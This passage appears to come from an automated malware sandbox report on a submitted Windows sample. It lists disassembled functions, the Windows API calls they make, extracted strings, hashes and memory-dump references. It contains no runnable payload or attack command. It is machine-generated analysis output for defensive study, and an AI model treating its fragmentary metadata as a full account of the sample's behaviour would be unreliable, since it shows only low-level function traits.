                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: b12116b3cf74c0214c8c26505fcc71c1ce7a29ca8b784a19eb1ccd143141d21e
                                    • Instruction ID: 9ea1e1dd4d88339fd13c325b61a531ae34228ba1a0a2ee3d0662c6aef1eccf74
                                    • Opcode Fuzzy Hash: b12116b3cf74c0214c8c26505fcc71c1ce7a29ca8b784a19eb1ccd143141d21e
                                    • Instruction Fuzzy Hash: BE014C3210CB116EB7373BB57C855572B8CEB16778B338729F314581E9EF118C406150
                                    Function 00369029 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,00380EE8,00000200,0036895F,003658FE,?,?,?,?,0034D25E,?,034414B0,00000063,00000004,0034CFE0,?), ref: 0036902E
                                    • _free.LIBCMT ref: 00369063
                                    • _free.LIBCMT ref: 0036908A
                                    • SetLastError.KERNEL32(00000000,00373958,00000050,00380EE8), ref: 00369097
                                    • SetLastError.KERNEL32(00000000,00373958,00000050,00380EE8), ref: 003690A0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_free
                                    • String ID: X7
                                    • API String ID: 3170660625-1737092782
                                    • Opcode ID: aff382f43ffc0d869e1861d96e0188f14dc08534a7f382b82824dfc5412df272
                                    • Instruction ID: 74d58f3b5af8d7806b0b515c95723593dd94c81f4ea239be815e0eb707a9ce1f
                                    • Opcode Fuzzy Hash: aff382f43ffc0d869e1861d96e0188f14dc08534a7f382b82824dfc5412df272
                                    • Instruction Fuzzy Hash: 39012836605B006BC33367756CC5BAB2A1D9BC5371B22C126F50AA625AEF70CC016160
                                    Function 0035DC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                    • API String ID: 0-1718035505
                                    • Opcode ID: 2223a097c127ce559d4cf67602d507bd33535ea98c5ad60dce5dbc53d9a05670
                                    • Instruction ID: 127abf2f8df020335d7fd782531f54a9cf1371df515bb5f0a868058570ea4b25
                                    • Opcode Fuzzy Hash: 2223a097c127ce559d4cf67602d507bd33535ea98c5ad60dce5dbc53d9a05670
                                    • Instruction Fuzzy Hash: 22012D316413225B4F375FB55C85EE613ECEE42723721423AED56D7230EA91C889E690
                                    Function 00368060 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 0036807E
                                      • Part of subcall function 003684DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0036BFA7,00373958,00000000,00373958,00000000,?,0036BFCE,00373958,00000007,00373958,?,0036C3CB,00373958), ref: 003684F4
                                      • Part of subcall function 003684DE: GetLastError.KERNEL32(00373958,?,0036BFA7,00373958,00000000,00373958,00000000,?,0036BFCE,00373958,00000007,00373958,?,0036C3CB,00373958,00373958), ref: 00368506
                                    • _free.LIBCMT ref: 00368090
                                    • _free.LIBCMT ref: 003680A3
                                    • _free.LIBCMT ref: 003680B4
                                    • _free.LIBCMT ref: 003680C5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID: 7
                                    • API String ID: 776569668-2922071456
                                    • Opcode ID: 77b64bbc29feb4a2ee2ea6f4786d61f7738820d081612a7b293553835cfdce0b
                                    • Instruction ID: dc4efd532b66aef2c4df3c858bc6054d72f9f1faf600a8f168145119e1ba2a3d
                                    • Opcode Fuzzy Hash: 77b64bbc29feb4a2ee2ea6f4786d61f7738820d081612a7b293553835cfdce0b
                                    • Instruction Fuzzy Hash: 89F03AB58015259F8B236F16BC81405BB6DB71E724F1A8B4AF804EBA74CF3148919FC1
                                    Function 00350CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00350D0D
                                      • Part of subcall function 0034ACF5: GetVersionExW.KERNEL32(?), ref: 0034AD1A
                                    • LocalFileTimeToFileTime.KERNEL32(?,00350CB8), ref: 00350D31
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00350D47
                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00350D56
                                    • SystemTimeToFileTime.KERNEL32(?,00350CB8), ref: 00350D64
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00350D72
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Time$File$System$Local$SpecificVersion
                                    • String ID:
                                    • API String ID: 2092733347-0
                                    • Opcode ID: 5bb46485b71a6a5726e2c3e1111fba0af075c331ea5005ff49a35e844785ba2f
                                    • Instruction ID: 9c3ce279bc226b6ef20434fd1696eb6ba67b2cba2da318b1858cbec5729f6bea
                                    • Opcode Fuzzy Hash: 5bb46485b71a6a5726e2c3e1111fba0af075c331ea5005ff49a35e844785ba2f
                                    • Instruction Fuzzy Hash: F131D67A90020AEBCB15DFE5C8859EFBBBCFF58700F04455AE955E7210E730AA85CB64
                                    Function 003591B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: _memcmp
                                    • String ID:
                                    • API String ID: 2931989736-0
                                    • Opcode ID: 0a21156ce9d3740838cc2d8057940efe51b6068c999aba2a48f224af73ba9d18
                                    • Instruction ID: 2988027eb40514a12e8de927dc8b38dd832034751245f2d9148ee5366c92b748
                                    • Opcode Fuzzy Hash: 0a21156ce9d3740838cc2d8057940efe51b6068c999aba2a48f224af73ba9d18
                                    • Instruction Fuzzy Hash: 3121957160020EFBE71B9E10CC81F6B77ADAB50786F11C92AFC0D9B225E374ED499691
                                    Function 0035D2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0035D2F2
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0035D30C
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0035D31D
                                    • TranslateMessage.USER32(?), ref: 0035D327
                                    • DispatchMessageW.USER32(?), ref: 0035D331
                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0035D33C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                    • String ID:
                                    • API String ID: 2148572870-0
                                    • Opcode ID: d28eb7d0e3dc6572d88399d52b8884d0eae45274361199fb7238920de10a856c
                                    • Instruction ID: ab5dafd0d29dfc0f25317d7f78d2b9eb092c58fd72f13d8743cc3f0b97d762b0
                                    • Opcode Fuzzy Hash: d28eb7d0e3dc6572d88399d52b8884d0eae45274361199fb7238920de10a856c
                                    • Instruction Fuzzy Hash: 7FF03C72A01129ABCB32ABA5EC4CEDBBF6DEF52392F058012FA06D2020D6348545C7A1
                                    Function 0035C40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                    Download Yara Rule
                                    APIs
                                    • _wcschr.LIBVCRUNTIME ref: 0035C435
                                      • Part of subcall function 003517AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0034BB05,00000000,.exe,?,?,00000800,?,?,003585DF,?), ref: 003517C2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: CompareString_wcschr
                                    • String ID: <$HIDE$MAX$MIN
                                    • API String ID: 2548945186-3358265660
                                    • Opcode ID: ddcb8473f3fe017f74229a30cb3f4e54efebe623bc2f40903a6c60cc550a4faa
                                    • Instruction ID: 4b109f8da80385c3481693458e34352118c01fbfa8e0d6839f3ebcb313dee17f
                                    • Opcode Fuzzy Hash: ddcb8473f3fe017f74229a30cb3f4e54efebe623bc2f40903a6c60cc550a4faa
                                    • Instruction Fuzzy Hash: 7931A272910309AEDF27DA55CC81EEA77BCEB1430AF004466FE0996061EBB18EC88A50
                                    Function 0035A990 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0034130B: GetDlgItem.USER32(00000000,00003021), ref: 0034134F
                                      • Part of subcall function 0034130B: SetWindowTextW.USER32(00000000,003735B4), ref: 00341365
                                    • EndDialog.USER32(?,00000001), ref: 0035A9DE
                                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0035A9F6
                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 0035AA24
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ItemText$DialogWindow
                                    • String ID: GETPASSWORD1$xj9
                                    • API String ID: 445417207-104683938
                                    • Opcode ID: 37fc17a9d92141e35c87dbf9dd0d2fccb7824c8e79ada68425320892326d7341
                                    • Instruction ID: 9ecd7344c349ea90582bf88ebb48d2f87e9aff1977d63cfd7da945d94dc144f7
                                    • Opcode Fuzzy Hash: 37fc17a9d92141e35c87dbf9dd0d2fccb7824c8e79ada68425320892326d7341
                                    • Instruction Fuzzy Hash: D8112B3294012C7ADB239E689D49FFB3B7CEF4A712F020111FE45B64A4C3619D59E672
                                    Function 0035ADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadBitmapW.USER32(00000065), ref: 0035ADFD
                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0035AE22
                                    • DeleteObject.GDI32(00000000), ref: 0035AE54
                                    • DeleteObject.GDI32(00000000), ref: 0035AE77
                                      • Part of subcall function 00359E1C: FindResourceW.KERNEL32(0035AE4D,PNG,?,?,?,0035AE4D,00000066), ref: 00359E2E
                                      • Part of subcall function 00359E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0035AE4D,00000066), ref: 00359E46
                                      • Part of subcall function 00359E1C: LoadResource.KERNEL32(00000000,?,?,?,0035AE4D,00000066), ref: 00359E59
                                      • Part of subcall function 00359E1C: LockResource.KERNEL32(00000000,?,?,?,0035AE4D,00000066), ref: 00359E64
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                    • String ID: ]
                                    • API String ID: 142272564-3352871620
                                    • Opcode ID: cf02fb04b2b71037ba7e2e2ca3a4665efa5e0d5e4e3820b64c05afec2afde1e8
                                    • Instruction ID: 465158822262d5ae3ae5ef076b9080dc62e3314eb2eff20a8982789051660101
                                    • Opcode Fuzzy Hash: cf02fb04b2b71037ba7e2e2ca3a4665efa5e0d5e4e3820b64c05afec2afde1e8
                                    • Instruction Fuzzy Hash: 4901C432540615A7C71367689C06F7FBBBDAB82B53F090116BD00BB2B1DA718C19A6A1
                                    Function 0035CC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0034130B: GetDlgItem.USER32(00000000,00003021), ref: 0034134F
                                      • Part of subcall function 0034130B: SetWindowTextW.USER32(00000000,003735B4), ref: 00341365
                                    • EndDialog.USER32(?,00000001), ref: 0035CCDB
                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0035CCF1
                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0035CD05
                                    • SetDlgItemTextW.USER32(?,00000068), ref: 0035CD14
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ItemText$DialogWindow
                                    • String ID: RENAMEDLG
                                    • API String ID: 445417207-3299779563
                                    • Opcode ID: 9bd09188a7084277db998910f288ae458ca8663e810edaf358e0b88aa9457b38
                                    • Instruction ID: 678c10101c6d389f5d5eb19f32a525e28147d2edb796189322ed8ee3da1d62a6
                                    • Opcode Fuzzy Hash: 9bd09188a7084277db998910f288ae458ca8663e810edaf358e0b88aa9457b38
                                    • Instruction Fuzzy Hash: 630128322943507EE1238F689C08F573BACEB5A707F110411F785A60F0C7A6690A8B65
                                    Function 00362503 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 0036251A
                                      • Part of subcall function 00362B52: ___AdjustPointer.LIBCMT ref: 00362B9C
                                    • _UnwindNestedFrames.LIBCMT ref: 00362531
                                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 00362543
                                    • CallCatchBlock.LIBVCRUNTIME ref: 00362567
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                    • String ID: /)6
                                    • API String ID: 2633735394-1202508477
                                    • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                    • Instruction ID: f34dad964619d3f1eb14fcc159e4e37022891e343a2b373c80d4fa1a1d180066
                                    • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                    • Instruction Fuzzy Hash: 9D010532000508ABCF239F65CC01E9B7BAAEF59710F168014FE1966124C336E961ABA1
                                    Function 003675C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00367573,00000000,?,00367513,00000000,0037BAD8,0000000C,0036766A,00000000,00000002), ref: 003675E2
                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 003675F5
                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00367573,00000000,?,00367513,00000000,0037BAD8,0000000C,0036766A,00000000,00000002), ref: 00367618
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AddressFreeHandleLibraryModuleProc
                                    • String ID: CorExitProcess$mscoree.dll
                                    • API String ID: 4061214504-1276376045
                                    • Opcode ID: 2751de733323e1bb3365425cfa90f5aa8ec7eeb9dd2025ed4104ae820eac9bd5
                                    • Instruction ID: 7a1cc3fe2205fdf24ef6d25ecef6b8bc01548e6c41c454139804a148e60c0e95
                                    • Opcode Fuzzy Hash: 2751de733323e1bb3365425cfa90f5aa8ec7eeb9dd2025ed4104ae820eac9bd5
                                    • Instruction Fuzzy Hash: 4BF0A430A04618FBCB279F54DC09BDDBFB8EF04715F404068F809A6150DB708A80DA54
                                    Function 0034EB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00350085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003500A0
                                      • Part of subcall function 00350085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0034EB86,Crypt32.dll,00000000,0034EC0A,?,?,0034EBEC,?,?,?), ref: 003500C2
                                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0034EB92
                                    • GetProcAddress.KERNEL32(003881C0,CryptUnprotectMemory), ref: 0034EBA2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                    • API String ID: 2141747552-1753850145
                                    • Opcode ID: 9649c11f5fdd004a53f6998bd5b4bc4b80e70aec0507735379a8bd35e9f11d1c
                                    • Instruction ID: 2bd51099139254ff0691be77364466fc673513cf10a6d4e14922729d97553f97
                                    • Opcode Fuzzy Hash: 9649c11f5fdd004a53f6998bd5b4bc4b80e70aec0507735379a8bd35e9f11d1c
                                    • Instruction Fuzzy Hash: B2E04F704047519ECB339F349848B82BEE4EF15701F00C81DE5DAD7190D7B9D584AB50
                                    Function 00367DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 7ed75ebdef615a8db9f51a5889b1ffa173b62844390d628f29b3a9cbc28b559b
                                    • Instruction ID: 18232cc59071edb75f554005b772f9cfa2cd82a79ee5a366b3ef43d1ad8a0e13
                                    • Opcode Fuzzy Hash: 7ed75ebdef615a8db9f51a5889b1ffa173b62844390d628f29b3a9cbc28b559b
                                    • Instruction Fuzzy Hash: 5E41F732A003049FCB25DF78C881A5EB7A5EF89718F5685A8E515EF345DB31ED05CB80
                                    Function 0036B610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetEnvironmentStringsW.KERNEL32 ref: 0036B619
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0036B63C
